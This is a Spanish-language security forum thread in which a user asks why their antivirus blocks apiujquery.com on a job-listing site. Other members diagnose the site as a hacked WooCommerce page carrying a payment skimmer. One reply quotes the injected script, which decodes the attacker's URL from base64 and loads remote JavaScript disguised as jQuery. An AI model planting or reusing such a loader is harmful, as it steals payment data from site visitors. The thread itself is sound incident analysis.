elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: AIO elhacker.NET 2021 Compilación herramientas análisis y desinfección malware


+  Foro de elhacker.net
|-+  Foros Generales
| |-+  Dudas Generales (Moderador: engel lex)
| | |-+  ¿Esta web está hackeada o soy yo el que tiene un virus?
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: ¿Esta web está hackeada o soy yo el que tiene un virus?  (Leído 904 veces)
Username_Loading...

Desconectado Desconectado

Mensajes: 6


Ver Perfil
¿Esta web está hackeada o soy yo el que tiene un virus?
« en: 10 Enero 2022, 14:09 pm »

Espero que sea el sitio correcto para escribir sobre el tema, no sabía muy bien dónde ponerlo.
Estaba buscando empleo por internet, y encontré una web muy buena (no es spam lo juro  :xD) que me daba bastante confianza. Lo digo porque hay muchas webs del estilo hechas sólo para robar tu información.
El caso es que de vez en cuando me saltaba el antivirus y me decía lo siguiente:

Código:
Malwarebytes
www.malwarebytes.com

-Detalles del registro-
Fecha del evento de protección: 10/1/22
Hora del evento de protección: 11:59
Archivo de registro: 543b138a-7204-11ec-8fbc-b8aeed3e456a.json

-Información del software-
Versión: 3.6.1.2711
Versión de los componentes: 1.0.482
Versión del paquete de actualización: 1.0.24228
Licencia: Prueba

-Información del sistema-
SO: Windows 10 (Build 19041.1415)
CPU: x64
Sistema de archivos: NTFS
Usuario: System

-Detalles del sitio web bloqueado-
Sitio web malicioso: 1
, , Bloqueado, [-1], [-1],0.0.0

-Datos de sitio web-
Categoría: Secuestro
Dominio: apiujquery.com
Dirección IP: [s]nosesideberíapublicarla[/s]
Puerto: [52348]
Tipo: Saliente
Archivo: c:/blabla/minavegador.exe



(end)

Como parecía una web de confianza y no me aclaré mucho por internet, pensé que lo de "secuestro" podría ser algún falso positivo al mandar los formularios de inscripción, así que añadí una excepción al antivirus. Pero comenzó a saltarme una ventana que contenía un formulario para introducir un método de pago  :huh: Curiosamente en inglés, algo raro en una web española enfocada al empleo en Castilla-La Mancha:
https://fv9-2.failiem.lv/down.php?i=7gmfgfh8c&view
(no me preguntéis por qué activé el inspector de elementos, no se nada de seguridad  :rolleyes: )

Así que aquí me asaltaron las dudas ¿estoy infectado? ¿lo está la web? ¿es una web falsa directamente?

Le hice un whois al dominio a ver que soltaba, pero era todo anónimo:
(Pongo todo tal y como aparece porque es información accesible de forma pública, espero que no haya nada sensible)

Código:

Domain Profile
Registrant REDACTED FOR PRIVACY
Registrant Org REDACTED FOR PRIVACY
Registrant Country REDACTED FOR PRIVACY
Registrar Webempresa Europa, S.L.
IANA ID: 5555555
URL: https://webempresa.com,http://www.webempresa.com
Whois Server: wedominios.webempresa.eu

(p)
Registrar Status activo, clientTransferProhibited
Dates 118 days old
Created on 2021-09-14
Expires on 2022-09-14
Updated on 2021-11-25  
Name Servers ARYANNA.NS.CLOUDFLARE.COM (has 23,268,507 domains)
MCGRORY.NS.CLOUDFLARE.COM (has 23,268,507 domains)
  
Tech Contact REDACTED FOR PRIVACY
REDACTED FOR PRIVACY,
REDACTED FOR PRIVACY, REDACTED FOR PRIVACY, REDACTED FOR PRIVACY, REDACTED FOR PRIVACY
IP Address 172.67.204.219 - -1 other site is hosted on this server
  
IP Location United States - California - San Francisco - Cloudflare Inc.
ASN United States AS13335 CLOUDFLARENET, US (registered Jul 14, 2010)
Domain Status Never Registered Before
IP History 1 change on 1 unique IP addresses over 1 years  
Registrar History 1 registrar  
Hosting History 1 change on 2 unique name servers over 1 year  
 Website
Website Title None given.  
Whois Record ( last updated on 2022-01-10 )
Domain Name: ofertasdetrabajoencastillalamancha.com
Registry Domain ID: 4231
Registrar WHOIS Server: wedominios.webempresa.eu
Registrar URL: https://webempresa.com
Updated Date: 2021-11-25T21:09:13Z
Creation Date: 2021-09-14T10:01:01Z
Registrar Registration Expiration Date: 2022-09-14T10:01:01Z
Registrar IANA ID: 5555555
Registrar Abuse Contact Email:
Registrar Abuse Contact Phone: +1.1235551234
Reseller: EXAMPLE RESELLER
Domain Status: activo
Registry Registrant ID: 16424
Registrant Name: REDACTED FOR PRIVACY
Registrant Organization: REDACTED FOR PRIVACY
Registrant Street: REDACTED FOR PRIVACY
Registrant City: REDACTED FOR PRIVACY
Registrant State/Province: REDACTED FOR PRIVACY
Registrant Postal Code: REDACTED FOR PRIVACY
Registrant Country: REDACTED FOR PRIVACY
Registrant Phone: REDACTED FOR PRIVACY
Registrant Email: REDACTED FOR PRIVACY
Registry Admin ID: 16423
Admin Name: REDACTED FOR PRIVACY
Admin Organization: REDACTED FOR PRIVACY
Admin Street: REDACTED FOR PRIVACY
Admin City: REDACTED FOR PRIVACY
Admin State/Province: REDACTED FOR PRIVACY
Admin Postal Code: REDACTED FOR PRIVACY
Admin Country: REDACTED FOR PRIVACY
Admin Phone: REDACTED FOR PRIVACY
Admin Email: REDACTED FOR PRIVACY
Registry Tech ID: 16426
Tech Name: REDACTED FOR PRIVACY
Tech Organization: REDACTED FOR PRIVACY
Tech Street: REDACTED FOR PRIVACY
Tech City: REDACTED FOR PRIVACY
Tech State/Province: REDACTED FOR PRIVACY
Tech Postal Code: REDACTED FOR PRIVACY
Tech Country: REDACTED FOR PRIVACY
Tech Phone: REDACTED FOR PRIVACY
Tech Email: REDACTED FOR PRIVACY
Registry Billing ID: 16425
Billing Name: REDACTED FOR PRIVACY
Billing Organization: REDACTED FOR PRIVACY
Billing Street: REDACTED FOR PRIVACY
Billing City: REDACTED FOR PRIVACY
Billing State/Province: REDACTED FOR PRIVACY
Billing Postal Code: REDACTED FOR PRIVACY
Billing Country: REDACTED FOR PRIVACY
Billing Phone: REDACTED FOR PRIVACY
Billing Email: REDACTED FOR PRIVACY
Name Server: aryanna.ns.cloudflare.com
Name Server: mcgrory.ns.cloudflare.com
Name Server: n/a
Name Server: n/a
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 0001-01-01T00:00:00Z <<<

; The data in this registrar whois database is provided to you for
; information purposes only, and may be used to assist you in obtaining
; information about or related to domain name registration records.
; We do not guarantee its accuracy.
; By submitting a WHOIS query, you agree that you will use this data
; only for lawful purposes and that, under no circumstances, you will
; use this data to
; a) allow, enable, or otherwise support the transmission by e-mail,
;    telephone, or facsimile of mass, unsolicited, commercial advertising
;    or solicitations to entities other than the data recipient's own
;    existing customers; or
; b) enable high volume, automated, electronic processes that send queries
;    or data to the systems of any Registry Operator or ICANN-Accredited
;    registrar, except as reasonably necessary to register domain names
;    or modify existing registrations.
; The compilation, repackaging, dissemination or other use of this data
; is expressly prohibited without prior written consent.
; These terms may be changed without prior notice. By submitting this
; query, you agree to abide by this policy.

Decía que la IP estaba alojada fuera de España:

Código:
IP Address 172.67.204.219 - -1 other site is hosted on this server
  
IP Location United States - California - San Francisco - Cloudflare Inc.
ASN United States AS13335 CLOUDFLARENET, US (registered Jul 14, 2010)

Muy raro ¿por qué alojarla tan lejos? Todavía no sabía si esto podía ser normal, ya que apenas se del tema, así que miré la dirección física que aparecía en la web y la consulté en Google ( Plaza de Grecia 1, Portal 1–Planta 1–Oficina 1, 45005 TOLEDO )

Estaba a nombre de una empresa llamada Centro Negocios Toledo CENT&TBS . Hice un Whois a su página web para comparar y parecía todo más normal, o por lo menos estaba alojada en España, como es lógico:

Código:
Domain Profile
Registrar Status taken
Name Servers ACLASS.EARTH.ORDERBOX-DNS.COM (has 369,880 domains)
ACLASS.MARS.ORDERBOX-DNS.COM (has 369,880 domains)
ACLASS.MERCURY.ORDERBOX-DNS.COM (has 369,880 domains)
ACLASS.VENUS.ORDERBOX-DNS.COM (has 369,880 domains)
  
Tech Contact
IP Address 89.140.72.190 - 36 other sites hosted on this server
  
IP Location Spain - Madrid - Madrid - A Class Publicidad
ASN Spain AS6739 ONO-AS Cableuropa - ONO, ES (registered Nov 24, 1999)
IP History 1 change on 1 unique IP addresses over 2 years  
Hosting History 2 changes on 3 unique name servers over 6 years  
 Website
Website Title  Centro de Empresas y Negocios Toledo & Business School  
Server Type Microsoft-IIS/8.5
Response Code 200
Terms 421 (Unique: 212, Linked: 31)
Images 16 (Alt tags missing: 0)
Links 28   (Internal: 17, Outbound: 6)
Whois Record ( last updated on 2022-01-10 )
% NOTE: The registry for this domain name does not publish ownership
%       records (whois records) in the standard format.  This data
%       represents the most likely status of the domain based on
%       information provided by the Internet's domain name servers (DNS).

domain: centronegociostoledo.es
status: taken
nameserver: aclass.earth.orderbox-dns.com
nameserver: aclass.mars.orderbox-dns.com
nameserver: aclass.mercury.orderbox-dns.com
nameserver: aclass.venus.orderbox-dns.com

Entonces pensé ¿Y que pasa con la dirección que bloquea Malwarebites? (ApiUjQuery.com)
Asumo que es la dirección a la que se "conecta" el formulario de pago que aparece en la imagen (no se si estoy usando los términos correctos pero espero estar explicándome bien  :rolleyes:). Así que le hago Whois y me suelta esto:

Código:
Whois Record for ApiUjQuery.com
How does this work?

 Domain Profile
Registrant REDACTED FOR PRIVACY
Registrant Org REDACTED FOR PRIVACY
Registrant Country us
Registrar ERANET INTERNATIONAL LIMITED Eranet International Limited
IANA ID: 1868
URL: http://www.eranet.com
Whois Server: whois.eranet.com

(p)
Registrar Status clientTransferProhibited
Dates 160 days old
Created on 2021-08-03
Expires on 2022-08-03
Updated on 2021-08-03  
Name Servers NOW1.DNS.COM (has 11,121,105 domains)
NOW2.DNS.COM (has 11,121,105 domains)
  
Tech Contact REDACTED FOR PRIVACY
REDACTED FOR PRIVACY,
REDACTED FOR PRIVACY, REDACTED FOR PRIVACY, REDACTED FOR PRIVACY, REDACTED FOR PRIVACY
(p) (f)
IP Address 51.178.8.230 is hosted on a dedicated server
  
IP Location Ukraine - Mykolayivs'ka Oblast' - Mykolaiv - Ivanov Michael
ASN Ukraine AS16276 OVH, FR (registered Feb 15, 2001)
Domain Status Registered And Active Website
IP History 2 changes on 2 unique IP addresses over 1 years  
Registrar History 1 registrar  
Hosting History 1 change on 2 unique name servers over 1 year  
 Website
Website Title  403 Forbidden  
Server Type nginx/1.18.0 (Ubuntu)
Response Code 403
Terms 5 (Unique: 5, Linked: 0)
Images 0 (Alt tags missing: 0)
Links 0   (Internal: 0, Outbound: 0)
Whois Record ( last updated on 2022-01-10 )
Domain name: apiujquery.com
Registry Domain ID: 2631247943_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.eranet.com
Registrar URL: http://www.eranet.com
Updated Date: 2021-08-04T00:00:00Z
Creation Date: 2021-08-04T01:46:52Z
Registrar Registration Expiration Date: 2022-08-04T00:00:00Z
Registrar: ERANET INTERNATIONAL LIMITED
Registrar IANA ID: 1868
Registrar Abuse Contact Email:
Registrar Abuse Contact Phone: +852.39995400
Reseller:    
Domain Status: clientTransferProhibited http://www.icann.org/epp#clientTransferProhibited
Registry Registrant ID: REDACTED FOR PRIVACY
Registrant Name: REDACTED FOR PRIVACY
Registrant Organization: REDACTED FOR PRIVACY
Registrant Street: REDACTED FOR PRIVACY
Registrant City: REDACTED FOR PRIVACY
Registrant State/Province: MX
Registrant Postal Code: REDACTED FOR PRIVACY
Registrant Country: US
Registrant Phone: REDACTED FOR PRIVACY
Registrant Phone Ext: REDACTED FOR PRIVACY
Registrant Fax: REDACTED FOR PRIVACY
Registrant Fax Ext: REDACTED FOR PRIVACY
Registrant Email:
http://www.tnet.hk/whois/message_to_contact.php?domain=apiujquery.com&contact=Owner
Registry Admin ID: REDACTED FOR PRIVACY
Admin Name: REDACTED FOR PRIVACY
Admin Organization: REDACTED FOR PRIVACY  
Admin Street: REDACTED FOR PRIVACY
Admin City: REDACTED FOR PRIVACY
Admin State/Province: REDACTED FOR PRIVACY
Admin Postal Code: REDACTED FOR PRIVACY
Admin Country: REDACTED FOR PRIVACY
Admin Phone: REDACTED FOR PRIVACY
Admin Phone Ext: REDACTED FOR PRIVACY
Admin Fax: REDACTED FOR PRIVACY
Admin Fax Ext: REDACTED FOR PRIVACY
Admin Email:
http://www.tnet.hk/whois/message_to_contact.php?domain=apiujquery.com&contact=Admin
Registry Tech ID: REDACTED FOR PRIVACY
Tech Name: REDACTED FOR PRIVACY
Tech Organization: REDACTED FOR PRIVACY
Tech Street: REDACTED FOR PRIVACY
Tech City: REDACTED FOR PRIVACY
Tech State/Province: REDACTED FOR PRIVACY
Tech Postal Code: REDACTED FOR PRIVACY
Tech Country: REDACTED FOR PRIVACY
Tech Phone: REDACTED FOR PRIVACY
Tech Phone Ext: REDACTED FOR PRIVACY
Tech Fax: REDACTED FOR PRIVACY
Tech Fax Ext: REDACTED FOR PRIVACY
Tech Email: http://www.tnet.hk/whois/message_to_contact.php?domain=apiujquery.com&contact=Tech

Name Server: now1.dns.com
Name Server: now2.dns.com
DNSSEC: unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/

For more information on Whois status codes, please visit https://icann.org/epp

Parece que todo está a nombre de un tipo llamado Ivanov Michael que vive en Mykolaiv, Urcania ¿quizás lo he entendido mal?   :o

Al buscar Mykolaiv - Ivanov Michael en Google, en los primeros resultados me aparece un perfil de Facebook de un tipo que dice ser "Fullstack Developer" (No lo comparto directamente por si incumple alguna norma del foro)

Con todo esto me he quedado con las siguientes dudas:

¿Debería alguien hablar con la empresa Centro Negocios Toledo CENT&TBS por si han sido infectados? ¿o acaso es una web falsa? ¿quizás soy yo el que está infectado?¿Todo esto es normal y me estoy montando una película  :xD ?

Espero no haberos aburrido mucho con este tocho, tampoco se si he usado bien la etiqueta "code", pero me parecía buena forma de diferenciar el texto. Si me resolvéis alguna duda me dejaríais mas tranquilo, y si no, gracias por leer igualmente  ;-)


En línea

MinusFour
Moderador Global
***
Desconectado Desconectado

Mensajes: 5.340


I'm fourth.


Ver Perfil WWW
Re: ¿Esta web está hackeada o soy yo el que tiene un virus?
« Respuesta #1 en: 10 Enero 2022, 14:37 pm »

Parece ser que es un ejemplo de typosquatting. No veo nada relacionado al dominio en ninguna parte y parece que esta caído.


En línea

#!drvy


Desconectado Desconectado

Mensajes: 5.781



Ver Perfil WWW
Re: ¿Esta web está hackeada o soy yo el que tiene un virus?
« Respuesta #2 en: 10 Enero 2022, 14:47 pm »

Sí, esta "infectada".



Código
  1. https://apiujquery.com/ajax/libs/jquery/3.5.1/jquery-3.11.0.min.js?i=https://ofertasdetrabajoencastillalamancha.com/&r2=83898abd5127431e1b24161920515687

Se hace pasar por api.jquery.com y hace meter datos pago para robo de informacion.

Este es el codigo que carga el archivo:
Código:
<script language="javascript">
var img = document.createElement('script');
img.setAttribute('async','');
img.setAttribute('src', window.atob("Ly9hcGl1anF1ZXJ5LmNvbS9hamF4L2xpYnMvanF1ZXJ5LzMuNS4xL2pxdWVyeS0zLjExLjAubWluLmpzP2k9") + window.location.href + window.atob("JnIyPQ==") + "83898abd5127431e1b24161920515687");
document.head.appendChild(img);


La página esa es un Wordpress, y tiene toda la pinta de que ya la han infectado más de una vez.

Saludos
En línea

Username_Loading...

Desconectado Desconectado

Mensajes: 6


Ver Perfil
Re: ¿Esta web está hackeada o soy yo el que tiene un virus?
« Respuesta #3 en: 10 Enero 2022, 14:51 pm »

Parece ser que es un ejemplo de typosquatting. No veo nada relacionado al dominio en ninguna parte y parece que esta caído.

¿Te refieres a cambiar una l por una I por ejemplo?
Encontré la página a través de Google, en la ofertas de empleo que aparecen, no se si servirá de ayuda.
¿Entonces toda la web sería falsa? (ofertasdetrabajoencastillalamancha.com) Porque antes de sospechar, como me ha parecido tan buena, la he compartido  :P

« Última modificación: 10 Enero 2022, 14:53 pm por Username_Loading... » En línea

#!drvy


Desconectado Desconectado

Mensajes: 5.781



Ver Perfil WWW
Re: ¿Esta web está hackeada o soy yo el que tiene un virus?
« Respuesta #4 en: 10 Enero 2022, 14:53 pm »

La pagina no tiene porque ser falsa. Parece ser un desarollo de esfuerzo bajo para aprovecharse de google ads peto las ofertas pueden ser reales. Lo que esta claro es que esta infectada.

Saludos
En línea

Username_Loading...

Desconectado Desconectado

Mensajes: 6


Ver Perfil
Re: ¿Esta web está hackeada o soy yo el que tiene un virus?
« Respuesta #5 en: 10 Enero 2022, 15:02 pm »

La pagina no tiene porque ser falsa. Parece ser un desarollo de esfuerzo bajo para aprovecharse de google ads peto las ofertas pueden ser reales. Lo que esta claro es que esta infectada.

Saludos

Espero no agotar vuestra paciencia, ya he dicho que no se mucho del tema.
Estoy tratando de comprender la información  :rolleyes:
¿Entonces la pagina web ofertasdetrabajoencastillalamancha.com ha sido infectada por alguien que se hace pasar por api.jquery.com para robar la información de los usuarios?
Lo bueno es que no estoy infectado ¿no?  ;-)
Y ¿No habría que avisar a los dueños de la web?
En línea

MinusFour
Moderador Global
***
Desconectado Desconectado

Mensajes: 5.340


I'm fourth.


Ver Perfil WWW
Re: ¿Esta web está hackeada o soy yo el que tiene un virus?
« Respuesta #6 en: 10 Enero 2022, 15:19 pm »

Puedes avisarle al dueño... Yo no usaría esa página por lo pronto. Ese archivo que cargan (que no es jQuery obviamente) puede hacer bastantes cosas malas....
En línea

Username_Loading...

Desconectado Desconectado

Mensajes: 6


Ver Perfil
Re: ¿Esta web está hackeada o soy yo el que tiene un virus?
« Respuesta #7 en: 10 Enero 2022, 15:50 pm »

Les he mandado un correo breve y se lo he explicado como he podido, también le he puesto un enlace al hilo  :laugh:

Si necesitan información pueden preguntar, para eso es su web  :xD

¡Gracias por los consejos! Me quedo más tranquilo  ;-)  :-*
En línea

el-brujo
ehn
***
Desconectado Desconectado

Mensajes: 20.929


La libertad no se suplica, se conquista


Ver Perfil WWW
Re: ¿Esta web está hackeada o soy yo el que tiene un virus?
« Respuesta #8 en: 10 Enero 2022, 18:37 pm »

Entonces se supone que el dominio  ofertasdetrabajoencastillalamancha.com con Woocommerce ha sido comprometida (hackeada) e infectada con malware

Aquí sale un ejemplo bien explicado:

WooCommerce Skimmer Spoofs Checkout Page
https://blog.sucuri.net/2021/11/woocommerce-skimmer-spoofs-checkout-page.html

https://www.virustotal.com/gui/domain/apiujquery.com/detection
https://www.joesandbox.com/analysis/535216/0/html

Ya pueden estar contentos que les hayas avisado.
En línea


Username_Loading...

Desconectado Desconectado

Mensajes: 6


Ver Perfil
Re: ¿Esta web está hackeada o soy yo el que tiene un virus?
« Respuesta #9 en: 11 Enero 2022, 01:18 am »


¡Vaya! Exactamente el mismo caso o.O Parece algo "común".
Estaré atento a ver si hay movimiento por el hilo, sería una pasada que la web acabe resolviendo el problema :laugh: Sólo tendrían que leer porque ha quedado perfectamente explicado
« Última modificación: 11 Enero 2022, 02:13 am por Username_Loading... » En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Alguien tiene esta fuente
Diseño Gráfico
maxtextla 4 3,123 Último mensaje 17 Septiembre 2009, 23:44 pm
por maxtextla
que cifrado tiene esta pagina??
Hacking
danielo- 1 2,805 Último mensaje 6 Abril 2010, 12:56 pm
por kamsky
Tu computadora Mac puede ser hackeada mientras está bloqueada
Noticias
wolfbcn 0 1,146 Último mensaje 17 Diciembre 2016, 02:43 am
por wolfbcn
Twitter está probando a indicar quién está ‘online’ y quién está ausente
Noticias
wolfbcn 0 361 Último mensaje 3 Septiembre 2018, 02:15 am
por wolfbcn
ERROR 457 esta clave ya esta asociada a un elemento de esta colección
Programación Visual Basic
GzaRC 0 1,470 Último mensaje 4 Septiembre 2019, 21:33 pm
por GzaRC
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines